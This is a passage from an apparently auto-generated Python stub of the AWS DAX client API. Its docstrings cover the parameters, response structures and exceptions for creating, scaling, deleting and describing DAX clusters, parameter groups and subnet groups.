:param PreferredMaintenanceWindow: Specifies the weekly time range during which maintenance on the DAX cluster is performed. It is specified as a range in the format ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). The minimum maintenance window is a 60 minute period. Valid values for ddd are:\n\nsun\nmon\ntue\nwed\nthu\nfri\nsat\n\nExample: sun:05:00-sun:09:00\n\nNote\nIf you don\'t specify a preferred maintenance window when you create or modify a cache cluster, DAX assigns a 60-minute maintenance window on a randomly selected day of the week.\n\n
:type NotificationTopicArn: string
:param NotificationTopicArn: The Amazon Resource Name (ARN) of the Amazon SNS topic to which notifications will be sent.\n\nNote\nThe Amazon SNS topic owner must be same as the DAX cluster owner.\n\n
:type IamRoleArn: string
:param IamRoleArn: [REQUIRED]\nA valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.\n
:type ParameterGroupName: string
:param ParameterGroupName: The parameter group to be associated with the DAX cluster.
:type Tags: list
:param Tags: A set of tags to associate with the DAX cluster.\n\n(dict) --A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.\nAWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .\nYou cannot backdate the application of a tag.\n\nKey (string) --The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.\n\nValue (string) --The value of the tag. Tag values are case-sensitive and can be null.\n\n\n\n\n
:type SSESpecification: dict
:param SSESpecification: Represents the settings used to enable server-side encryption on the cluster.\n\nEnabled (boolean) -- [REQUIRED]Indicates whether server-side encryption is enabled (true) or disabled (false) on the cluster.\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster that you have created.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterAlreadyExistsFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.InsufficientClusterCapacityFault
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ClusterQuotaForCustomerExceededFault
DAX.Client.exceptions.NodeQuotaForClusterExceededFault
DAX.Client.exceptions.NodeQuotaForCustomerExceededFault
DAX.Client.exceptions.InvalidVPCNetworkStateFault
DAX.Client.exceptions.TagQuotaPerResourceExceeded
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
def create_parameter_group(ParameterGroupName=None, Description=None):
"""
Creates a new parameter group. A parameter group is a collection of parameters that you apply to all of the nodes in a DAX cluster.
See also: AWS API Documentation
Exceptions
:example: response = client.create_parameter_group(
ParameterGroupName='string',
Description='string'
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group to apply to all of the clusters in this replication group.\n
:type Description: string
:param Description: A description of the parameter group.
:rtype: dict
ReturnsResponse Syntax
{
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
Response Structure
(dict) --
ParameterGroup (dict) --
Represents the output of a CreateParameterGroup action.
ParameterGroupName (string) --
The name of the parameter group.
Description (string) --
A description of the parameter group.
Exceptions
DAX.Client.exceptions.ParameterGroupQuotaExceededFault
DAX.Client.exceptions.ParameterGroupAlreadyExistsFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
:returns:
DAX.Client.exceptions.ParameterGroupQuotaExceededFault
DAX.Client.exceptions.ParameterGroupAlreadyExistsFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def create_subnet_group(SubnetGroupName=None, Description=None, SubnetIds=None):
"""
Creates a new subnet group.
See also: AWS API Documentation
Exceptions
:example: response = client.create_subnet_group(
SubnetGroupName='string',
Description='string',
SubnetIds=[
'string',
]
)
:type SubnetGroupName: string
:param SubnetGroupName: [REQUIRED]\nA name for the subnet group. This value is stored as a lowercase string.\n
:type Description: string
:param Description: A description for the subnet group
:type SubnetIds: list
:param SubnetIds: [REQUIRED]\nA list of VPC subnet IDs for the subnet group.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
Response Structure
(dict) --
SubnetGroup (dict) --
Represents the output of a CreateSubnetGroup operation.
SubnetGroupName (string) --
The name of the subnet group.
Description (string) --
The description of the subnet group.
VpcId (string) --
The Amazon Virtual Private Cloud identifier (VPC ID) of the subnet group.
Subnets (list) --
A list of subnets associated with the subnet group.
(dict) --
Represents the subnet associated with a DAX cluster. This parameter refers to subnets defined in Amazon Virtual Private Cloud (Amazon VPC) and used with DAX.
SubnetIdentifier (string) --
The system-assigned identifier for the subnet.
SubnetAvailabilityZone (string) --
The Availability Zone (AZ) for the subnet.
Exceptions
DAX.Client.exceptions.SubnetGroupAlreadyExistsFault
DAX.Client.exceptions.SubnetGroupQuotaExceededFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
:returns:
DAX.Client.exceptions.SubnetGroupAlreadyExistsFault
DAX.Client.exceptions.SubnetGroupQuotaExceededFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
"""
pass
def decrease_replication_factor(ClusterName=None, NewReplicationFactor=None, AvailabilityZones=None, NodeIdsToRemove=None):
"""
Removes one or more nodes from a DAX cluster.
See also: AWS API Documentation
Exceptions
:example: response = client.decrease_replication_factor(
ClusterName='string',
NewReplicationFactor=123,
AvailabilityZones=[
'string',
],
NodeIdsToRemove=[
'string',
]
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster from which you want to remove nodes.\n
:type NewReplicationFactor: integer
:param NewReplicationFactor: [REQUIRED]\nThe new number of nodes for the DAX cluster.\n
:type AvailabilityZones: list
:param AvailabilityZones: The Availability Zone(s) from which to remove nodes.\n\n(string) --\n\n
:type NodeIdsToRemove: list
:param NodeIdsToRemove: The unique identifiers of the nodes to be removed from the cluster.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster, after you have decreased its replication factor.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.NodeNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
def delete_cluster(ClusterName=None):
"""
Deletes a previously provisioned DAX cluster. DeleteCluster deletes all associated nodes, node endpoints and the DAX cluster itself. When you receive a successful response from this action, DAX immediately begins deleting the cluster; you cannot cancel or revert this action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_cluster(
ClusterName='string'
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the cluster to be deleted.\n
:rtype: dict
ReturnsResponse Syntax{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --A description of the DAX cluster that is being deleted.
ClusterName (string) --The name of the DAX cluster.
Description (string) --The description of the cluster.
ClusterArn (string) --The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --The total number of nodes in the cluster.
ActiveNodes (integer) --The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --The DNS hostname of the endpoint.
Port (integer) --The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --A list of nodes that are currently in the cluster.
(dict) --Represents an individual node within a DAX cluster.
NodeId (string) --A system-generated identifier for the node.
Endpoint (dict) --The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --The DNS hostname of the endpoint.
Port (integer) --The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --The current status of the node. For example: available .
ParameterGroupStatus (string) --The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --The current state of the topic.
SubnetGroup (string) --The subnet group where the DAX cluster is running.
SecurityGroups (list) --A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --An individual VPC security group and its status.
SecurityGroupIdentifier (string) --The unique ID for this security group.
Status (string) --The status of this security group.
IamRoleArn (string) --A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --The name of the parameter group.
ParameterApplyStatus (string) --The status of parameter updates.
NodeIdsToReboot (list) --The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --The description of the server-side encryption status on the specified DAX cluster.
Status (string) --The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
def delete_parameter_group(ParameterGroupName=None):
"""
Deletes the specified parameter group. You cannot delete a parameter group if it is associated with any DAX clusters.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_parameter_group(
ParameterGroupName='string'
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group to delete.\n
:rtype: dict
ReturnsResponse Syntax{
'DeletionMessage': 'string'
}
Response Structure
(dict) --
DeletionMessage (string) --A user-specified message for this action (i.e., a reason for deleting the parameter group).
Exceptions
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'DeletionMessage': 'string'
}
"""
pass
def delete_subnet_group(SubnetGroupName=None):
"""
Deletes a subnet group.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_subnet_group(
SubnetGroupName='string'
)
:type SubnetGroupName: string
:param SubnetGroupName: [REQUIRED]\nThe name of the subnet group to delete.\n
:rtype: dict
ReturnsResponse Syntax{
'DeletionMessage': 'string'
}
Response Structure
(dict) --
DeletionMessage (string) --A user-specified message for this action (i.e., a reason for deleting the subnet group).
Exceptions
DAX.Client.exceptions.SubnetGroupInUseFault
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'DeletionMessage': 'string'
}
"""
pass
def describe_clusters(ClusterNames=None, MaxResults=None, NextToken=None):
"""
Returns information about all provisioned DAX clusters if no cluster identifier is specified, or about a specific DAX cluster if a cluster identifier is supplied.
If the cluster is in the CREATING state, only cluster level information will be displayed until all of the nodes are successfully provisioned.
If the cluster is in the DELETING state, only cluster level information will be displayed.
If nodes are currently being added to the DAX cluster, node endpoint information and creation time for the additional nodes will not be displayed until they are completely provisioned. When the DAX cluster state is available , the cluster is ready for use.
If nodes are currently being removed from the DAX cluster, no endpoint information for the removed nodes is displayed.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_clusters(
ClusterNames=[
'string',
],
MaxResults=123,
NextToken='string'
)
:type ClusterNames: list
:param ClusterNames: The names of the DAX clusters being described.\n\n(string) --\n\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Clusters': [
{
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Clusters (list) --
The descriptions of your DAX clusters, in response to a DescribeClusters request.
(dict) --
Contains all of the attributes of a specific DAX cluster.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
